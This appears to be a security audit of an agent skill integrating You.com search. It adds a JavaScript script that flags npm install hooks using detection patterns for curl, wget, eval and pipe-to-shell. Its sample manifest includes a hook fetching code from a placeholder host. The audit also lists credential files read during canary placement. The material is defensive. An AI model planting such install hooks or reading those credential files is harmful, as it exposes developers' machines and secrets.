Is edwardirby/ydc-ai-sdk-integration safe?
https://github.com/openclaw/skills/tree/main/skills/edwardirby/ydc-ai-sdk-integration
The ydc-ai-sdk-integration skill is a well-structured developer workflow guide with no prompt injection, no hidden instructions, and no malicious code execution surface. Runtime monitoring confirmed that all sensitive-file accesses occurred before installation (attributable to the oathe canary-placement process), no unexpected network connections were made, all canary honeypots remained intact, and filesystem changes were limited exclusively to the skill directory. The only material risks are the inherent third-party data-sharing nature of You.com's search API (expected and disclosed) and a standard npm package dependency that should be independently vetted.
Findings (5)
LOW Third-Party API Data Sharing by Design -8
Every query made through youSearch, youExpress, or youContents is transmitted to You.com's API servers along with the user's YDC_API_KEY. This is the explicit purpose of the skill but represents a data-sharing agreement users must accept. Users in regulated or sensitive environments should evaluate You.com's data retention policies before installing.
LOW Third-Party npm Package with Unaudited Install Lifecycle -5
The skill instructs the agent to install @youdotcom-oss/ai-sdk-plugin, which may contain npm preinstall/postinstall scripts that execute arbitrary code on the developer's machine. The package is from a named org and is disclosed upfront, but the skill's security posture depends on that package remaining uncompromised.
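The check a practitioner wants before letting that package install is to read its lifecycle scripts. The script below is an added example, not code from the skill, the audit framework, or the @youdotcom-oss/ai-sdk-plugin package: it takes a parsed package.json, lists the hooks npm would run automatically, and flags commands that download or evaluate code. The sample manifest is constructed for illustration and does not describe the real plugin.

```javascript
// Added example (not part of the skill or the audit): list the npm lifecycle
// scripts that would run on install for a package.json, so they can be read
// before the package is installed. The manifest below is constructed and
// hypothetical; it is not the real @youdotcom-oss/ai-sdk-plugin manifest.

// preinstall, install and postinstall run for any dependency installed from
// the registry; prepare is included because it runs for git-sourced deps.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

function findInstallScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((name) => Object.prototype.hasOwnProperty.call(scripts, name))
    .map((name) => ({ hook: name, command: scripts[name] }));
}

// Crude triage: anything that fetches a URL, pipes into a shell, or evaluates
// inline code deserves a manual read before the package is allowed to install.
const SUSPICIOUS = [
  /\bcurl\b/,
  /\bwget\b/,
  /\beval\b/,
  /node\s+-e/,
  /\|\s*(ba)?sh\b/,
  /https?:\/\//,
];

function triageScripts(found) {
  return found.map((s) => ({
    ...s,
    suspicious: SUSPICIOUS.some((re) => re.test(s.command)),
  }));
}

// Constructed sample manifest (hypothetical): one benign hook and one
// download-and-execute style hook.
const samplePkg = {
  name: "example-plugin",
  version: "1.0.0",
  scripts: {
    build: "tsc -p .",
    prepare: "npm run build",
    postinstall: "node -e \"require('https').get('https://example.invalid/x.js')\"",
  },
};

const report = triageScripts(findInstallScripts(samplePkg));
for (const r of report) {
  console.log(
    `${r.hook}: ${r.command}${r.suspicious ? "  <-- review before installing" : ""}`
  );
}
```

To get the real manifest without executing anything, `npm pack @youdotcom-oss/ai-sdk-plugin` downloads the tarball so its package.json can be extracted and fed to this check, and `npm view @youdotcom-oss/ai-sdk-plugin scripts` prints the scripts field from the registry. If the hooks are not needed, `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) skips them, with the caveat that this also skips scripts of every other dependency, including native-build steps some packages rely on.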
INFO youContents Second-Order Content-Injection Risk -5
The youContents URL-extraction tool fetches and returns raw web content into the agent's context. A sophisticated attacker who controls a web page the user later visits could embed prompt-injection payloads in that page's content, which youContents would then surface to the agent. This is a theoretical second-order risk contingent on separate attack vectors, not a defect in this skill's instructions.
INFO Author Attribution Mismatch -3
The SKILL.md frontmatter declares metadata.author as 'youdotcom-oss' (a GitHub organization) while _meta.json lists the owner as the individual 'edwardirby'. This does not constitute a security threat, but it reduces provenance auditability and may cause users to incorrectly attribute the skill to the You.com OSS organization.
INFO Pre-Clone Sensitive File Accesses Attributed to Audit Framework 0
inotify and auditd logs show opens of .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and GCloud credentials at 13:59:02, six seconds before the skill git clone at 13:59:08. Timing and canary-intact result confirm these are oathe canary-placement reads, not skill-initiated. Documented here for full transparency.